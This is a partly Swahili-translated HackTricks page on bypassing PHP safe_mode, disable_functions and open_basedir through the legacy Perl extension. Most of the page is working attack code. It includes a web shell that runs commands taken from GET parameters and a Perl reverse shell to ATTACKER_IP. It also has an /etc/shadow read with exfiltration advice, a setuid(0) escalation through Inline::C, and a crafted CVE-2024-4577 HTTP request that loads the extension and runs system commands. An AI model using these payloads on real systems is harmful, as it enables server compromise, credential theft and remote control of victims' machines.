PHP Perl Extension Safe_mode Bypass Exploit

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muktadha

The issue tracked as CVE-2007-4596 comes from the legacy perl PHP extension, which embeds a full Perl interpreter without honoring PHP’s safe_mode, disable_functions, or open_basedir controls. Any PHP worker that loads extension=perl.so gains unrestricted Perl eval, so command execution remains trivial even when all classic PHP process-spawning primitives are blocked. Although safe_mode disappeared in PHP 5.4, many outdated shared-hosting stacks and vulnerable labs still ship it, so this bypass is still valuable when you land on legacy control panels.

Ulinganifu na Hali ya Ufungaji (2025)

• The last PECL release (perl-1.0.1, 2013) targets PHP ≥5.0; PHP 8+ generally fails because the Zend APIs changed.
• PECL is being superseded by PIE, but older stacks still ship PECL/pear. Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).

Kujenga Mazingira ya Mtihani mwaka 2025

• Fetch perl-1.0.1 from PECL, compile it for the PHP branch you plan to attack, and load it globally (php.ini) or via dl() (if permitted).
• Mapishi ya haraka ya maabara ya Debian:

sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2

• During exploitation confirm availability with var_dump(extension_loaded('perl')); or print_r(get_loaded_extensions());. If absent, search for perl.so or abuse writable php.ini/.user.ini entries to force-load it.
• Because the interpreter lives inside the PHP worker, no external binaries are needed—network egress filters or proc_open blacklists do not matter.

Mnyororo wa kujenga kwenye mwenyeji ikiwa phpize inapatikana

If phpize and build-essential are present on the compromised host, you can compile and drop perl.so without shelling out to the OS:

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

Ikiwa open_basedir imetekelezwa, hakikisha .user.ini na .so zilizowekwa ziko katika njia inayoruhusiwa; directive ya extension= bado inaheshimiwa ndani ya basedir. Mtiririko wa kompilishaji unaendana na mwongozo wa PHP kwa kujenga PECL extensions.

PoC ya awali (NetJackal)

Kutoka http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, bado ni ya msaada kuthibitisha kwamba extension inajibu eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Maboresho ya Payload ya Kisasa

1. TTY kamili kupitia TCP

Mfasiri uliowekwa ndani anaweza kupakia IO::Socket hata kama /usr/bin/perl imezuiwa:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape Hata na open_basedir

Perl haizingatii open_basedir ya PHP, kwa hivyo unaweza kusoma faili yoyote:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Pipisha matokeo kupitia IO::Socket::INET au Net::HTTP ili exfiltrate data bila kugusa vielezi vinavyosimamiwa na PHP.

3. Inline Compilation kwa Kupandisha Ruhusa

Ikiwa Inline::C inapatikana kwa mfumo mzima, jenga misaidizi ndani ya ombi bila kutegemea ffi au pcntl za PHP:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Chukulia Perl kama seti ya zana ya LOLBAS—kwa mfano, dump MySQL DSNs hata kama mysqli haipo:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ Matumizi mabaya: Loading perl.so via PHP-CGI Argument Injection (CVE-2024-4577)

Kwa installs za Windows ambazo bado zinaonyesha PHP-CGI, regression ya 2024 ya argument-injection (CVE-2024-4577) inaruhusu kupitisha chaguzi za -d bila ukomo kwa interpreter. Hii inamaanisha unaweza kupakia Perl extension hata wakati dl() imezimwa na php.ini ni read-only:

• Jenga au upakie perl.dll/perl.so inayolingana kwenye web-writable path (e.g., C:\xampp\htdocs\temp\perl.dll).
• Tuma request moja la HTTP ambalo linaingiza -d extension=C:\\xampp\\htdocs\\temp\\perl.dll na, katika request body ile ile, payload ya Perl:

POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

Kwa kuwa PHP worker sasa inaingiza Perl kabla ya kusoma mwili wa ombi, udhibiti wote wa kawaida wa disable_functions/open_basedir hupitishwa. Hii inafanya kazi kwenye stacks za Windows/CGI zilizo na udhaifu hadi zitakaporekebishwa (PHP 8.1.29/8.2.20/8.3.8 na matoleo ya baadaye yamelitatua tatizo). Ikiwa open_basedir inazuia njia ya DLL, weka faili ndani ya saraka ya msingi inayoruhusiwa kwanza au tumia njia ya DLL inayosomeka kwa umma iliyosambazwa na XAMPP.

References

• CVE-2007-4596 summary and timeline
• PECL perl extension package information
• PHP Manual: building PECL extensions with phpize
• PECL homepage announcing PIE replacement
• CVE-2024-4577 PHP-CGI argument injection PoC
• Plesk advisory summarizing CVE-2024-4577 impact and patched versions

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.